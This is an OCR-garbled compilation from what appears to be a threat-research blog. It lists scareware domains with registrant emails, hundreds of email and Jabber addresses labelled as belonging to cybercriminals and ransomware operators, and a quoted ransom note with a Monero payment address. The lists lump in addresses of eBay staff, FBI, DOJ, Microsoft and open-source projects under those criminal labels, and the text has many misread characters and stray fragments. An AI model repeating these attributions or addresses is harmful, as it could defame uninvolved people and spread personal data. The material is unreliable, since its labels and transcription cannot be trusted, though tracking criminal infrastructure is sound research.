defender-scan-for-you .com - Email: information@brunter.sw 
defender-scan-for-you3 .com - Email: informatio@belize.ca 
foryoumalwarecheck .com - Email: information@brunter.sw 
friends-protection .com - Email: m.smith@Recruiters.com 
further-scan .com - Email: m.smith@Recruiters.com 
goodonlineprotection .com - Email: info@time.co.uk 
good-scans .com - Email: m.smith@Recruiters.com 
guidetosecurity3 .com - Email: info@time.co.uk 
howtocleanpc2 .com - Email: admin@gnar-star.com 
howtoprotectpc3 .com - Email: admin@gnar-star.com 
howtosecure2 .com - Email: admin@gnar-star.com 
howtosecurea .com - Email: admin@gnar-star.com 
how-to-secure-pc2 .com - Email: admin@gnar-star.com 
protection-secrets .com - Email: info@time.co.uk 
scan-for-you .com - Email: information@brunter.sw 
scannerantimalware2 .com 

scannerantimalware4 .com 

scannerantimalware6é .com 

secure-your-data0 .com - Email: spradlin@carrental.com 
secure-your-files .com - Email: spradlin@carrental.com 
security-guide5 .com - Email: JohnnySMcmillan@yahoo.com 
security-infol .com - Email: JohnnySMcmillan@yahoo.com 
security-tips3 .com - Email: info@time.co.uk 
security-tools4 .com - Email: JohnnySMcmillan@yahoo.com 
webviruscheck1 .com 

webviruscheck-4 .com 

webviruscheck5 .com 


Let us further expand the portfolio by listing the newly introduced scareware domains at 
[38]91.212.107.103, which was first mentioned in part one of the [39]Koobface Botnet’s 
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fj10@carderplanet.cc 


caesar@carderplanet.cc 


powerseller@carderplanet.cc 


rdmya@carderplanet.cc 


dohlii@carderplanet.cc 


complain@carderplanet.cc 


afelio@carderplanet.cc 


mike@carderplanet.cc 


ultimatum@carderplanet.cc 


ika@jabber.sg 
pass@xxx.com 
bre@headcounter.org 
godtimees@jabber.org 
parrotard@jabber.org 
komproll@thesecure.biz 
razin@carderplanet.cc 
sccss@xmpp.pro 
irzhikOO07@limun.org 
vOid cc@hotmail.com 
vOid@jabber.cn 
dongle0101@yahoo.com 
nrew89@gmail.com 
andrey89@nextmail.ru 
nestle@neko.im 
mazafaka@libero. it 
777flyck777@gmail.com 
gugusik@thesecure. biz 
partyzan@thesecure.biz 
cr4shO@gmail.com 

anti _xabar@mail.ru 
p@safenrgy.com 
box4qip@mail.ru 
nolme@swissjabber.ch 
barlog@Online.at 


karabas@jabbim.com 
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supportstyle@jabbim.com 
hkn@novonordisk.com 
sal@jabba.in 
dominium@thesecure.biz 
ika@jabba.in 
ika@thesecure.biz 
dearadmin@jabber.org 
sal@jabber.sg 
privatenet@jabber.cx 
billpaid@xmpp.jp 
marshm3llo@exploit.im 
mak@mazafaka.info 
brainjabber@default.rs 
cart3r@shangryla.net 
solid s@carderplanet.cc 
k3@pbank.com.ua 
4docent@gmail.com 
user@example.org 
leeloodallas@jabber.org 
brando@jabber.no 
fly@darklife.ws 
narcause@swissjabber.ch 
best bunnn@hotmail.com 
robinbobin@jabber.cn 
everything@jabber.ms 
pipl-partners@jabber.xakep.kz 
janus@haliluya.biz 
rs-socks@thesecure.biz 
kentyay@yahoo.com 
hunterirby@yahoo.com 
Shakil999@yahoo.com 

dr _uploaderl@mail.ru 
dr _uploader@yahoo.com 
cyberalibi@gmail.com 
asadcp@mail.ru 
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sd@fucksheep.org 
x86 64nsd@fucksheep.org 
northpole@live.com 
u@yahoo.co.uk 
ika@spam.coop 
slevin@europe.com 
alexmussel@aol.com 
novashogun18@live.com 
satoshi@gmx.de 
whitephoenix@mail.ru 
alesiayglesias@yahoo.com 
crazzzyhorse79@aol.com 
icamis@4host.info 
judidadada@btinternet.com 
spdteam@tom.com 
conf@infosystem.ru 
syrian.es.sy@gmail.com 
sea@sea.sy 
sal@thesecure. biz 
jrandom@example.com 
mOudi@9.cn 
Flouf@live.fr 
support@webmoney.ru 
1234@ftp.narod.ru 
hOmini@mail.ru 
mavook@gmail.com 
troxel@yandex.ru 
arxwolf2010@mail.ru 
certificate@trustcenter.de 
premium-server@thawte.com 
psyche.evolution@gmail.com 
Eagle@diginf.ru 
ronnich@gmail.com 
nenastnyj@gmail.com 
volodyja@gmail.com 
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vlaman@gmail.com 
transitaircargoinc@gmail.com 
bashorg@talking.cc 
xtexgroup@gmail.com 
Krotreal@mobsoft.com 
andrew@elitum.com 
redeye@jabber.no 
andy@imjabber.com 
asdas12334@mail.ru 
andy@im.despmedia.com 
shaman@gateline.net 
dgc@gateline.net 
WHanlinLittleton@gmail.com 
cwilson2020@comcast.net 
flynavy@hotmail.com 
Mangerfredmanger@gmail.com 
capellau1968.test@yahoo. it 
pr@cray.com 
tcouch@microsoft.com 
ir@cray.com 

fc@mail-eye.com 
h0O7@interia.pl 
service@youtube.com 
silentbob@safe-mail.net 
cuneiform@cognitive.ru 
maestro@jabber.org 
eims@ic.fbi.gov 
onenote@exploit.im 
maestro@jabbber.at 
USADC.VIS.USVTMCCormick@usdoj.gov 
reshenie _problem@yahoo.com 
agressor@evilium.com 
666@agressor.cc 
juliethotel@hotmail.com 
support@dropping-service. biz 
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admin@NetworkSolutionsmsx.co.uk 
sad@aol.com 

asf@msn.com 
gfhgf@yahoo.com 
kk@sgarrist.net 
myname@mymail.com 
support@synebs.com 
mih@colt.ilogic.ru 
forum@pont.ru 
agslab@gmail.com 
cgi-mailer-bounces-90434292@kundenserver.de 
E1CcQXv-0002Wz-00@mrvnet.kundenserver.de 
abuse@kundenserver.de 
clansman@pisem.net 
chrischildsLO@btinternet.com 
kirsty314@hotmail.com 
order@info-dumps.com 
peacockpower@excite.com 
flexip@mail.ru 
burkan02@hotmail.com 
admin@go.org.ua 
kavkey@mail.ru 
XXX@xXxXx.com 
zadnical2@hotmail.com 
zadnical2@aol.com 
zadnical2@yahoo.com 
Rabotalrubl@mail.ru 
jag@jabba.biz 
salinemotors@safe-mail.net 
at@fsb-rf.ru 
drondron@safe-mail.net 
abase@hotmail.com 
aesop@hotmail.com 
ail@hotmail.com 


ape@hotmail.com 
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appear@hotmail.com 
athens@hotmail.com 
bare@hotmail.com 
bays@hotmail.com 
being@hotmail.com 
belt@hotmail.com 
bills@hotmail.com 
blurs@hotmail.com 
bosom@hotmail.com 
chafe@hotmail.com 
chimp@hotmail.com 
closet@hotmail.com 
cobble@hotmail.com 
coda@hotmail.com 
coup@hotmail.com 
cram@hotmail.com 
decor@hotmail.com 
dee@hotmail.com 
diets@hotmail.com 
doily@hotmail.com 
douse@hotmail.com 
drank@hotmail.com 
eagle@hotmail.com 
edges@hotmail.com 
extent@hotmail.com 
feel@hotmail.com 
fetal@hotmail.com 
focus@hotmail.com 
foxy@hotmail.com 
fully@hotmail.com 
gamut@hotmail.com 
globe@hotmail.com 
glum@hotmail.com 
gmt@hotmail.com 


guard@hotmail.com 
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heath@hotmail.com 
hints@hotmail.com 
hired@hotmail.com 
hydra@hotmail.com 
ida@hotmail.com 
incest@hotmail.com 
inner@hotmail.com 
john@hotmail.com 
joshua@hotmail.com 
lava@hotmail.com 
lawn@hotmail.com 
lax@hotmail.com 
lids@hotmail.com 
lime@hotmail.com 
loll@hotmail.com 
loved@hotmail.com 
mary@hotmail.com 
mats@hotmail.com 
meal@hotmail.com 
meek@hotmail.com 
might@hotmail.com 
mno@hotmail.com 
momma@hotmail.com 
mommy@hotmail.com 
mope@hotmail.com 
mum@hotmail.com 
nba@hotmail.com 
nil@hotmail.com 
oral@hotmail.com 
oust@hotmail.com 
owe@hotmail.com 
path@hotmail.com 
paula@hotmail.com 
pen@hotmail.com 
plead@hotmail.com 
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plump@hotmail.com 
poll@hotmail.com 
pupil@hotmail.com 
rash@hotmail.com 
rep@hotmail.com 
review@hotmail.com 
rims@hotmail.com 
roads@hotmail.com 
roost@hotmail.com 
ruins@hotmail.com 
salami@hotmail.com 
scold@hotmail.com 
sid@hotmail.com 
sink@hotmail.com 
smoky@hotmail.com 
sobs@hotmail.com 
solemn@hotmail.com 
sons@hotmail.com 
spurt@hotmail.com 
stan@hotmail.com 
stick@hotmail.com 
subs@hotmail.com 
tame@hotmail.com 
tempt@hotmail.com 
toll@hotmail.com 
toss@hotmail.com 
ttt@hotmail.com 
tuna@hotmail.com 
vista@hotmail.com 
weave@hotmail.com 
weigh@hotmail.com 
wharf@hotmail.com 
xrays@hotmail.com 
bug@hotmail.com 
offer@hotmail.com 
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names@hotmail.com 


fucker@hotmail.com 


CardOperations@thebancorp.com 
sarphrmanager@hotmail.com 


johneastwooddom@yahoo.com 


tt@jabber.bz 

support tt@jabber.bz 
login@jabber.ru 
ylrahwlu@bolander.com 
novalogico@nycny.net 
ro@jabber.ru 
astrO@astr0.ru 
tqpo21@gmail.com 
ccmaster@mail.ru 
roksalena@inbox.|v 
drug@qwarta.ru 
waldi@debian.org 
ccrc@crime-research.org 
vbrjw@hotmail.com 
vbzn@hotmail.com 
vcfa@hotmail.com 
vcfzrym@mail.com 
vcgq@hotmail.com 
vcqwprb@hotmail.com 
vcrz@hotmail.com 
vczjdt@hotmail.com 
vdbxwpy@hotmail.com 
vdguo@hotmail.com 
k55v7ubfct@o0v4o.net 
k56to3y7lu@vlefd.com 
k5nx3gygla@szkw3.com 
k67bly43zd@li07y.org 
k68v3yp7pl@3qnqo.net 
k6i7j77bIn@vt5gm.org 
k6ic5gpcxh@dnd72.org 
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sonya@kp.ua 
jim@anchorcontrols.com 
chutchins1@cfl.rr.com 
arbitrage@webmoney.ru 
lir-admin@rdsnet.ro 
hostmaster@ripe.net 
Xxx@mail.com 
XXXXXxXxX@alltown.com 
XXXXX@pacbell.net 
buster@mail.natm.ru 
123@mail.com 

vernon _walcott@yahoo.com 
dcreech2005@hotmail.com 
dcreech1999@yahoo.com 
mailname@domain.com 
henor@jabber.bz 
henor@jabber.org 
passport@wmtransfer.com 
client@jabber.vendorsname.vn 
petr@digitalspy.ru 
hoocker82@mail.ru 
Xxx@yandex.ru 
later@jabber.vendorsname.vn 
anti-laksys@mail.ru 
Ahi@ajabber.net 
sales@rprlinsider.de 
fanesso@jabber.bz 
kim405@bellsouth.net 
support@microsoft.com 
vn@conference.jabber.bz 
client@jabber.bz 
zig-service@thesecure. biz 
dots@thesecure. biz 
saturn@jabber.bz 


MAILER-DAEMON@yahoo.com 
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Scareware Business Model as a centralized hosting location for the gang’s portfolio. 
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Scareware domains parked at 91.212.107.103: 
g-antivirus .com - Email: mhbilate@gmail.com 
generalantivirus com - Email: compalso@gmail.com 
general-antivirus .com - Email: abuse@domaincp.net.cn 
general-av .com - Email: mhbilate@gmail.com 
generalavs .com - Email: mhbilate@gmail.com 
gobackscan .com - Email: alcnafuch@gmail.com 
gobarscan .com - Email: jowimpee@gmail.com 
godeckscan .com - Email: quetotator@gmail.com 
godirscan .com - Email: momorule@gmail.com 
godoerscan .com - Email: geofishe@gmail.com 
goeachscan .com - Email: momorule@gmail.com 
goeasescan .com - Email: geofishe@gmail.com 
gofatescan .com - Email: alcnafuch@gmail.com 
gofowlscan .com - Email: stinfins@gmail.com 
gohandscan .com - Email: quetotator@gmail.com 
goherdscan .com - Email: jowimpee@gmail.com 
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later@ajabber.net 
translater@thesecure.biz 
later@jabber.bz 
Srv@xXxx.com 
teamproject@mjabber.info 
teamproject@jabber.bz 
flycracker@jabber.bz 
cashing@jabber.cn 
s@shady.nl 

donni _Brasco@jabba.in 
Laurie.jensen@hotmail.com 
Larry-Sarff1967@hotmail.com 
DarianHall Jr@hotmail.com 
suspension@ebay.com 
bio4life@aol.com 
andrey2003@ngs.ru 
grig_@fromru.com 
affiliate@phreaker.net 
shereen333@yahoo.com 
support@balthost.ee 
caliente@chat.ru 
wmbox@mail.ru 
falcones@tochka.ru 
admin@fakeidscan.info 
scan@ftp.fakeidscan.info 
info@emailpromo.org 
avensys@avensys.ru 
encorewOrk@yahoo.com 
richard.cole@rocketmail.com 
junior.minor@yahoo.com 
support@icamis.biz 
joker@azz.ru 

jrh@mail.ru 
jnene@aol.com 


abrown@ebay.com 
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abuse@ebay.com 
accessories@ebay.com 
accettare@ebay.com 
accidentally@ebay.com 
account@ebay.com 
acker@ebay.com 
activity@ebay.com 
actually@ebay.com 
acy@ebay.com 
acyaay@ebay.com 
acyay@ebay.com 
adevanss@ebay.com 
admiller@ebay.com 
admissions@ebay.com 
adrian@ebay.com 
ads@ebay.com 
adults@ebay.com 
advancer@ebay.com 
adventures@ebay.com 
advertising@ebay.com 
advisers@ebay.com 
aegean@ebay.com 
affilates@ebay.com 
affillates@ebay.com 
afiliados@ebay.com 
afraid@ebay.com 
agendum@ebay.com 
agility@ebay.com 
agree-questions@ebay.com 
agree@ebay.com 
aide@ebay.com 
aly@ebay.com 
andrew@ebay.com 
anita@ebay.com 


antiquemall@ebay.com 
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antiques@ebay.com 
april@ebay.com 
arity@ebay.com 
arlene@ebay.com 
arly@ebay.com 
armand@ebay.com 
arnold3a@ebay.com 
arnold@ebay.com 
art@ebay.com 
assistant@ebay.com 
assistenza@ebay.com 
assurance@ebay.com 
astein@ebay.com 
atch@ebay.com 
ation@ebay.com 


auaffillates@ebay.com 


auagreequestion@ebay.com 


auprivacy@ebay.com 


ausafeharbour@ebay.com 


ausuggest@ebay.com 
ausupport@ebay.com 
aw-confirm@ebay.com 
aw@ebay.com 
awagoner@ebay.com 
beanbags@ebay.com 
beck@ebay.com 
billing@ebay.com 
booksmag@ebay.com 
brian@ebay.com 
bscheuer@ebay.com 
bscholle@ebay.com 
bsmith@ebay.com 
buddy@ebay.com 
buddyitems@ebay.com 


business@ebay.com 
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bworkman@ebay.com 
caagreequestion@ebay.com 
canard@ebay.com 
cars@ebay.com 
cassi@ebay.com 
casuggest@ebay.com 
Ccasupport@ebay.com 
cbrown@ebay.com 
cericson@ebay.com 
cfroysla@ebay.com 
cgould@ebay.com 
charity@ebay.com 
chayes@ebay.com 
checkitout@ebay.com 
chinatown@ebay.com 
coderisme@ebay.com 
coins@ebay.com 
collctb|@ebay.com 
colleen@ebay.com 
comics@ebay.com 
computer@ebay.com 
confidentiel@ebay.com 
counters@ebay.com 
cthornhi@ebay.com 
ctywatch@ebay.com 
damnproxies@ebay.com 
daphne@ebay.com 
david.smith@ebay.com 
ddonovan@ebay.com 
ddonovie@ebay.com 
decline@ebay.com 
dee@ebay.com 
derevia@ebay.com 
diffamation@ebay.com 
dj@budsonthebay.com 
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dkourian@ebay.com 
dlevy@ebay.com 
dolls@ebay.com 
dpride@ebay.com 
drew@ebay.com 
dusty@ebay.com 
eabram@ebay.com 
ebay@ebay.com 
ebayseller@ebay.com 
ebayuniversity@ebay.com 
ebentley@ebay.com 
eguiller@ebay.com 
electronics@ebay.com 
elvis@ebay.com 
emerge@ebay.com 
ewatch@ebay.com 
fashion@ebay.com 
forrest-eastbound@ebay.com 
foundation@ebay.com 
fraud@ebay.com 
fryen@ebay.com 


gallery@ebay.com 


gcqueue@support.gc.ebay.com 


gianni@ebay.com 
goglobal@ebay.com 
golocal@ebay.com 
good2deal _with@ebay.com 
gr8_2dealwith@ebay.com 
gzemor@ebay.com 
haley@ebay.com 
hobbies@ebay.com 
holly@ebay.com 
infringement@ebay.com 
investigazione@ebay.com 


investor relations@ebay.com 
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iprequest@ebay.com 
istrack@ebay.com 
itagreequestion@ebay.com 
jackie@ebay.com 
jaoe@ebay.com 
jchu@ebay.com 
jerry@ebay.com 
jesse@ebay.com 
jewelry@ebay.com 
jhancock@ebay.com 
jhoward@ebay.com 
jhuff@ebay.com 
jkim@ebay.com 
jmathiso@ebay.com 
jmmartin@ebay.com 
jmoe6869@ebay.com 
joan@ebay.com 
jobs@ebay.com 
jparaske@ebay.com 
jperrine@ebay.com 
jwalter@ebay.com 
kane@ebay.com 
katia@ebay.com 
katy@ebay.com 
kawiley@ebay.com 
kaye@ebay.com 
kazim@ebay.com 
kbauer@ebay.com 
kcity@ebay.com 
keith@ebay.com 
kelley@ebay.com 
kelly@ebay.com 
ken@ebay.com 
kerseem@ebay.com 
kevinpD@ebay.com 
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kgyij6rls9a@ebay.com 
kharper@ebay.com 
kim@ebay.com 

kim _stone@ebay.com 
kindhearted@ebay.com 
kking@ebay.com 
klubavs@ebay.com 
lagcsupport@ebay.com 
Ibabcock@ebay.com 
Ichamber@ebay.com 
leo@ebay.com 
lisa@ebay.com 
Imarcus@ebay.com 
localtrading@ebay.com 
louise@ebay.com 
lwood@messagebay.com 
maeve@ebay.com 


management@ebay.com 


marketing@welcome.ebay.com 


matrim@ebay.com 
mbingham@ebay.com 
misterlister@ebay.com 
mkadic@ebay.com 
moana@ebay.com 
moreinfo@ebay.com 
motors-suggest@ebay.com 
motors-support@ebay.com 
mr.mintcamera@ebay.com 
mschauga@ebay.com 
muebelha@ebay.com 
music@ebay.com 
mye@comparebay.com 
newebay@ebay.com 
ngilbert@ebay.com 
nicola.coxson@ebay.com 
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nlofgren@ebay.com 
onlineideas@ebay.com 
patti@ebay.com 
pbtagsale@ebay.com 
pclarke@ebay.com 
perfectpay@ebay.com 
photo@ebay.com 
pickle@ebay.com 
pkeller@ebay.com 
pongo@ebay.com 
pottery@ebay.com 
powerit@ebay.com 
powersellersinfo@ebay.com 
premiersupport@ebay.com 
privacy@ebay.com 
pwatz@ebay.com 
pwitten@ebay.com 
questionconditions@ebay.com 
queue@support.ebay.com 
randyj@mobilebay.com 
recommended 4 u@ebay.com 
renee@willges.ebay.com 
report@ebay.com 
rich-westbound@ebay.com 
rminenno@ebay.com 
rpruitt@ebay.com 
rs@ebay.com 
rstanger@ebay.com 
rswebform@ebay.com 
rt@ebay.com 
rthomas@ebay.com 
rthompso@ebay.com 
rules@ebay.com 
rumbi.pfende@ebay.com 
russ@ebay.com 
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ryOltnwizaj@ebay.com 
sa@ebay.com 
sSaaeo@ebay.com 
safe@ebay.com 
safeguard@ebay.com 
safehabor@ebay.com 
safeharbor@ebay.com 
safeharbour@ebay.com 
safehorbor@ebay.com 
safetradingenhancements@ebay.com 
safety@ebay.com 
safetyharbor@ebay.com 
saftharbor@ebay.com 
saj2er@ebay.com 
sales@ebay.com 
sandres@ebay.com 
sara@ebay.com 
scifi@ebay.com 
seniors@ebay.com 
service@ebay.com 
sgrov2@ebay.com 
sgrov3@ebay.com 
shari@ebay.com 
shiggins@ebay.com 
shillers@ebay.com 
sienna@ebay.com 
sonny@ebay.com 
sports@ebay.com 
st@ebay.com 
stamps@ebay.com 
suggest@ebay.com 
support@ebay.com 
susan@ebay.com 
sutley@ebay.com 


swalker@ebay.com 
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sydney@ebay.com 
tasfuchs@ebay.com 
tborovat@ebay.com 
tes@ebay.com 
thr0210@aol2.ebay.com 
timepieces@ebay.com 
timesensitive@ebay.com 
tmckenna@ebay.com 
tmichaels@ebay.com 
toysbbs@ebay.com 
tutor@ebay.com 
ukinvestigations@ebay.com 
ukprivacy@ebay.com 
uksupport@ebay.com 
user@ebay.com 
vinnie@ebay.com 
wking@ebay.com 
peter@severamail.com 
postmaster@deadhouse.ru 
nastoyashiy@user.com 
spoof@ebay.com 
ok@msk.zoo.ru 
urina-ru@yandex.ru 
this. Dswartz@bju.edu 
intim hard sex _porno2006@mail.ru 
admin@LawServices.ru 
admin@x25.cc 
kenny@mighty.co.za 
jack2001@o02.pl 
bobjackson@zwallet.com 
blablabla@comcast.net 
service@paypal.com 
tracking@yandex.ru 
jobs@google.com 
ddu@e-gold.com 
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goironscan. com - Email: aloxier@gmail.com 
gojestscan. com - Email: jowimpee@gmail.com 
golimpscan. com - Email: stinfins@gmail.com 
golookscan. com - Email: stinfins@gmail.com 
gomendscan. com - Email: gleyersth@gmail.com 
gomutescan. com - Email: momorule@gmail.com 
gonamescan. com - Email: geofishe@gmail.com 


goneatscan .com - Email: momorule@gmail.com 
gopickscan. com - Email: momorule@gmail.com 
gorestscan. com - Email: quetotator@gmail.com 
goroomscan. com - Email: gleyersth@gmail.com 
gosakescan. com - Email: stinfins@gmail.com 
goscanadd. com - Email: momorule@gmail.com 
goscanback .com - Email: alcnafuch@gmail.com 
goscanbar .com - Email: jowimpee@gmail.com 
goscancode .com - Email: geofishe@gmail.com 
goscandeck. com - Email: geofishe@gmail.com 
goscandir. com - Email: crschuma@gmail.com 
goscandoer .com - Email: crschuma@gmail.com 
goscanease. com - Email: crschuma@gmail.com 
goscanfowl. com - Email: stinfins@gmail.com 
goscanhand. com - Email: quetotator@gmail.com 
goscanherd. com - Email: jowimpee@gmail.com 
goscanjest. com - Email: jowimpee@gmail.com 
goscanlike. com - Email: geofishe@gmail.com 
goscanlimp. com - Email: stinfins@gmail.com 
goscanmend .com - Email: gleyersth@gmail.com 
goscanname. com - Email: crschuma@gmail.com 
goscanneat .com - Email: crschuma@gmail.com 
goscanpick. com - Email: crschuma@gmail.com 


goscanref. com - Email: quetotator@gmail.com 
goscanrest .com - Email: quetotator@gmail.com 
goscanroom .com - Email: gleyersth@gmail.com 
goscansake. com - Email: stinfins@gmail.com 
goscanslip. com - Email: jowimpee@gmail.com 
goscansole .com - Email: crschuma@gmail.com 
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euro-imperial@mail.com 
zlodei@prvmail.net 
errrtt@gmail.com 
prozvon-us@safe-mail.net 
issuer1@10910599114111115111102116.com 
issuer2@10910599114111115111102116.com 
support@krutikservers.com 
peter@severa.biz 
interest@netbilling.com 
XXXXX@mail.ru 
wrznet@yahoo.com 
eh _raiderO4@yahoo.com 
sjooneor@yahoo.com 
ddmann226@hotmail.com 
mattman436@netscape.net 
cadhudson@prodigy.net 
denis@bizcom.dol.ru 
bizcom@cityline.ru 
azurevn@bk.ru 
cool-sam@yandex.ru 
easy@easycash.ru 
alexey@migtel.ru 
renzo@bk.ru 
easycash@mail.ru 
QEAAAAA@migtel.ru 
easy cash@ru.ru 
web-17467459@zbackend1.aha.ru 
Rachel.Chan@rackspace.co.uk 
admin@inet-reklama.ru 
dbmaster@jopasoft.com 
opa@yandex.ru 
fsb@fsb.ru 
mlu@jabber.ru 
prokaznik@metronome.ru 
eburg@mail.portland.co.uk 
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S@gmail.com 
ck@neomailbox.com 
info@cyb-security.net 
asdqwdasd@asdasdaq.com 
gc ww@hotmail.com 
websupport@kspu.karelia.ru 
bucklerw@hotmail.com 
fialex@usa.com 
Kristen.Gaither@careerbuilder.com 
all-about-all@mail.ru 
mortonzmail@jabber.org 
blabla@e-gold.com 
skynetlaboratory@yahoo.com 
fraud@fraud.name 
affquestion@gmail.com 
holder@holder.com 
info@abdullahost.com 
247support@live.ru 
support@tiket.cc 
signmark@gmail.com 
XXXXXXXX@mMail.ru 
develop@ancud.ru 
justinsholl@yahoo.com 
signmark@bespont.com 
7eLO2428 ddu@e-gold.com 
hujomajo@gmail.com 
bp@jabber.vendorsname.vn 
noar@jabber.bz 
ruppert@jabber.bz 
Phantom@jabber.bz 
mendozas@jabber.bz 
asa@jabber.bz 

donni _brasco@jabber.bz 
X-RAY @jabber.bz 

donni _brasco@jabber.dz 
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bp@jabber.bz 
dyadya@ajabber.net 
fff3fff@jabber.bz 
salomon@jabber.bz 
eskalibur@eskaliburinform.com 
help-bison@gnu.org 
suport@superbank.com 


Sample personally identifiable cybercriminals XMPP/Jabber 
XMPP/Jabber provider include: 


seotest@swissjabber.ch 
ksx@jabber.dk 
firstvpn@jabber.cz 
synack@xjabber.org 
moviestar@jabber.de 
aril0Okrat@jabber.mipt.ru 
markus123@jabber.cz 
maestro@jabber.at 
asuwant@jabber.ccc.de 
koska@jabber.ccc.de 
d4s@jabber.fr 
roxas@swissjabber.ch 
no.like.other@jabber.cd 
greystone@jabber.cn 
ps2k20@jabber.ru 
gangass@jabber.at 
bruj@jabber.minus273.org 
support@1jabber.com 
admin@1jabber.com 
negro _albino@jabber.ru 
ika@jabber.cx 
Beny.Krick@jabber.in 
ika@jabber.sg 
godtimees@jabber.org 
parrotard@jabber.org 
vOid@jabber.cn 
nolme@swissjabber.ch 


account 


IDs sorted by 


27785 


dearadmin@jabber.org 
sal@jabber.sg 
privatenet@jabber.cx 
brainjabber@default.rs 
leeloodallas@jabber.org 
brando@jabber.no 
narcause@swissjabber.ch 
robinbobin@jabber.cn 
everything@jabber.ms 
pipl-partners@jabber.xakep.kz 
redeye@jabber.no 
andy@imjabber.com 
maestro@jabber.org 
tt@jabber.bz 

support tt@jabber.bz 
login@jabber.ru 
ro@jabber.ru 
henor@jabber.bz 
henor@jabber.org 
client@jabber.vendorsname.vn 
later@jabber.vendorsname.vn 
Ahi@ajabber.net 
fanesso@jabber.bz 
vn@conference.jabber.bz 
client@jabber.bz 
saturn@jabber.bz 
later@ajabber.net 
later@jabber.bz 
teamproject@mjabber.info 
teamproject@jabber.bz 
flycracker@jabber.bz 
cashing@jabber.cn 
mlu@jabber.ru 
mortonzmail@jabber.org 
bp@jabber.vendorsname.vn 
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noar@jabber.bz 
ruppert@jabber.bz 
Phantom@jabber.bz 
mendozas@jabber.bz 
asa@jabber.bz 
donni _brasco@jabber.bz 
X-RAY @jabber.bz 
donni _brasco@jabber.dz 
bp@jabber.bz 
dyadya@ajabber.net 
fff3fff@jabber.bz 
salomon@jabber.bz 
fastchk@xmpp.su 
coding@xmpp.jp 
looklingtobuy@xmpp.jp 
bOrman@xmpp.jp 
synack@xmpp.su 
topdos@xmpp.jp 
polobandit@xmpp.jp 
none _1@xmpp.jp 
prof777@xmpp.jp 
success@xmpp.pro 
acsyS@xmpp.jp 
night.walker@xmpp.jp 
aventus@xmpp.jp 
plgs@xmpp.jp 
golden _triangle@xmpp.jp 
dds@xmpp.jp 
d02@xmpp.jp 
sccss@xmpp.pro 
billpaid@xmpp.jp 
dosx@exploit.im 
cityofgod@exploit.im 
ia@exploit.im 
dr32@exploit.im 
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chopin@exploit.im 
asuwant@exploit.im 
finedumps.com@exploit.im 
dpp@exploit.im 
g3mz@exploit.im 
A.M.1.G.0.S@exploit.im 
pro.stuffer@exploit.im 
exroot@exploit.im 
master.zu@exploit.im 
fingerlink@exploit.im 
Gangass@exploit.im 
888300@exploit.im 
vvMvv@exploit.im 
marshm3llo@exploit.im 
onenote@exploit.im 
fastchk@dlab.im 
dosx@exploit.im 
cityofgod@exploit.im 
ia@exploit.im 
dr32@exploit.im 
vetman3@blah.im 
synack@dlab.im 
chopin@exploit.im 
asuwant@exploit.im 
finedumps.com@exploit.im 
dpp@exploit.im 
g3mz@exploit.im 
A.M.1.G.0.S@exploit.im 
p-x@hacker.im 
wermonter@neko.im 
onkelzzz@pandion.im 
sandman@jab.im 
pro.stuffer@exploit.im 
exroot@exploit.im 
master.zu@exploit.im 
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fingerlink@exploit.im 
Gangass@exploit.im 
888300@exploit.im 
vvMvv@exploit.im 
2002@chatme.im 
s3x@neko.im 
nestle@neko.im 
marshm3llo@exploit.im 
onenote@exploit.im 
dibua@thesecure. biz 
starik@thesecure. biz 
epicman@thesecure.biz 
well.good@thesecure.biz 
elcondor@thesecure.biz 
komproll@thesecure.biz 
gugusik@thesecure. biz 
partyzan@thesecure.biz 
dominium@thesecure. biz 
ika@thesecure. biz 
rs-socks@thesecure. biz 
sal@thesecure. biz 
zig-service@thesecure.biz 
dots@thesecure. biz 
translater@thesecure.biz 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEh6bohGpm7FEy AUI 2XxSEWUIdGXEt 4iWf2z7TOKp4sskARm 
gD1M2hy_YpiaPuSbSDAADPI2aKzAYbc9eqSa4mBuJCMp_odEK4V1R 


19.8.6 A Compilation of Personally Identifiable Email Address Accounts Known to 
Belong to Ransomware Operators (2023-08-20 20:37) 


[1] 
21759 


C) 


If you close this window, you can always restart and it should appear again. 


All your files have been encrypted by us. This means you will be unable to access or use 


them. In order to retrieve them 


must send 0.3 monero (about $120 USD) to: 


46FXmRvyffuS9NNUs95rHx5cVQqU2z2200 7wYfDiGaGjBGtP7cfSEhaQ lqy7waqV7bcNnrNUf2n 1 gugrOmKPG8U6AqHwy 


Make sure you incl your payment ID: 


Use CTRL+C to copy both 


IF YOU DO NOT INCLUDE YOUR PAYMENT ID, YOUR FILES CANNOT BE DECRYPTED. Do not 
waste your time -- only we can decrypt your files. 


If you have paid, click on the DECRYPT button to return your files to normal. Don't worry, we'll give you 


your files back if you pay. 


Dear blog readers, 


The following is a set of personally identifiable email address accounts known to belong to 
ransomware operators or participants in ransomware-themed affiliate-based partner programs 
which I’ve decided to share with everyone doing research on the topic and looking for clues or 
additional resources on how to improve their research including U.S Law Enforcement where 
the ultimate goal would be to track down monitor and prosecute the individuals behind these 


campaigns internationally. 


Sample personally identifiable email address accounts known to belong to ransomware oper- 


ators or members of ransomware themed affiliate-based networks include: 


restorealldata@firemail.cc 
gorentos@bitmessage.ch 
doctor777@mail.fr 

b @mail2tor.com 
databack44@tuta.io 
mosteros@firemail.cc 
nmosteros@firemail.cc 
ngorentos@bitmessage.ch 
godecrypt@onionmail.org 
kryzikrut@airmail.cc 
lockhelp@qq.com 
hlper4y@tutanota.com 
millenisO00@qq.com 


rdpconnect@protonmail.com 
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nullcipher@cock.li 
greenlite@keemail.me 
datos@onionmail.org 
ks20296@email.vccs.edu 
getdataback22@protonmail.com 
zdarovachel@gmx.at 
nzdarovachel@gmx.at 
hupstore@keemail.me 

Cobra _Locker@protonmail.com 
nCobra _Locker@protonmail.com 
yasomoto@tutanota.com 
datos@msgsafe.io 
ndatos@onionmail.org 
emiliantor@mailfence.com 


emilianazizi@tutanota.com 


Jeremyspineberg11@tutanota.com 
GeromeSkinggagard1999@tutanota.com 
Jeremyspineberg11@protonmail.com 
nJeremyspineberg11@tutanota.com 
nGeromeSkinggagard1999@tutanota.com 


nJeremyspineberg11@protonmail.com 


caspers@scryptmail.com 
caspers@tuta.io 
helpteam38@protonmail.com 
hccapx@protonmail.com 
newpatek@cock.|i 
barboza40@yahoo.com 
0x69x@protonmail.com 
n0Ox69x@protonmail.com 
trfgklmbvzx@aol.com 
don.diablo@aol.com 
varasto@firemail.cc 
nvarasto@firemail.cc 
umbrella _cor@zohomail.eu 


numbrella _cor@zohomail.eu 
